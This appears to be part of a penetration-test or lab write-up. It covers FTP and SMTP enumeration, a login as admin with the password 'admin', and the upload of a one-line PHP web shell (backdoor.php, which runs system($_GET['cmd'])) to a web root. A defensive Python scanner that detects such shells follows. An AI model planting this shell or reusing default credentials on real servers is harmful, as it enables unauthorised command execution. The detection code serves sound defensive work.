FTP

No anonymous access.

PORT   STATE SERVICE REASON         VERSION
21/tcp open  ftp     syn-ack ttl 63 vsftpd 3.0.3
|_banner: 220 (vsFTPd 3.0.3)
Service Info: OS: Unix

The password for the admin user was admin. I was able to find that there was indeed a user named admin on the SMTP server because of the smtp-enum script.

In the FTP server I was able to put files onto the webserver.

ftp> ls
229 Entering Extended Passive Mode (|||59748|)
ftp: Can't connect to `192.168.143.56:59748': Connection timed out
200 EPRT command successful. Consider using EPSV.
150 Here comes the directory listing.
drwxr-xr-x    2 1001     0            4096 May 26  2020 contactform
drwxr-xr-x    2 1001     0            4096 May 26  2020 css
drwxr-xr-x    3 1001     0            4096 May 26  2020 img
-rw-r--r--    1 1001     0           23364 May 27  2020 index.php
drwxr-xr-x    2 1001     0            4096 May 26  2020 js
drwxr-xr-x   11 1001     0            4096 May 26  2020 lib
226 Directory send OK.
ftp> exit
221 Goodbye.
batcat backdoor.php 
───────┬─────────────────────────────────────────────────────────────────────────────────────────────────────────────
       │ File: backdoor.php
───────┼─────────────────────────────────────────────────────────────────────────────────────────────────────────────
   1   │ <pre>
   2   │ <?php
   3   │ system($_GET['cmd']);
   4   │ ?>
   5   │ </pre>
───────┴────────────────────────────────────────────────────────────────────────────────────────────────────────────
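
A defender-side check for the issue shown above, as an added example that is not part of the original notes: it walks a web root and flags script files that changed after the last known deployment or that pass request input straight to a command-execution function. The sample tree, the file lib/mail.php and the deployment timestamp are constructed for illustration.

```python
import os
import re
import tempfile
from pathlib import Path

# PHP functions that pass a string to the OS shell.
EXEC_FUNCS = r"(?:system|exec|shell_exec|passthru|popen|proc_open)"
# A call whose arguments include request-controlled input, e.g. system($_GET['cmd']).
TAINTED_EXEC = re.compile(
    r"\b" + EXEC_FUNCS + r"\s*\([^;]*\$_(?:GET|POST|REQUEST|COOKIE)\b", re.IGNORECASE
)
SCRIPT_EXT = {".php", ".phtml", ".phar"}


def scan_webroot(root, deployed_at):
    """Return sorted (path, line_no, reason); deployed_at is an assumed known epoch time."""
    findings = []
    for path in Path(root).rglob("*"):
        if not path.is_file() or path.suffix.lower() not in SCRIPT_EXT:
            continue
        rel = path.relative_to(root).as_posix()
        if path.stat().st_mtime > deployed_at:  # line_no 0 marks a whole-file finding
            findings.append((rel, 0, "modified after last deployment"))
        for no, line in enumerate(path.read_text(errors="replace").splitlines(), 1):
            if TAINTED_EXEC.search(line):
                findings.append((rel, no, "request input passed to command execution"))
    return sorted(findings)


def build_constructed_webroot(deployed_at):
    """Constructed sample tree: two benign scripts plus the uploaded file from the notes."""
    root = Path(tempfile.mkdtemp())
    (root / "lib").mkdir()
    samples = {  # name -> (body, mtime offset in seconds from deployment)
        "index.php": ("<?php echo htmlspecialchars($_GET['page'] ?? 'home'); ?>\n", -3600),
        "lib/mail.php": ("<?php $out = exec('uptime'); ?>\n", -3600),
        "backdoor.php": ("<pre>\n<?php\nsystem($_GET['cmd']);\n?>\n</pre>\n", 600),
    }
    for name, (body, offset) in samples.items():
        (root / name).write_text(body)
        os.utime(root / name, (deployed_at + offset, deployed_at + offset))
    return root


if __name__ == "__main__":
    deployed = 1590537600  # constructed deployment time (27 May 2020 00:00 UTC)
    for finding in scan_webroot(build_constructed_webroot(deployed), deployed):
        print(finding)
```

The pattern is line-based, so a call split across lines or routed through an intermediate variable is not matched; the modification-time check covers those cases when the deployment time is tracked.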
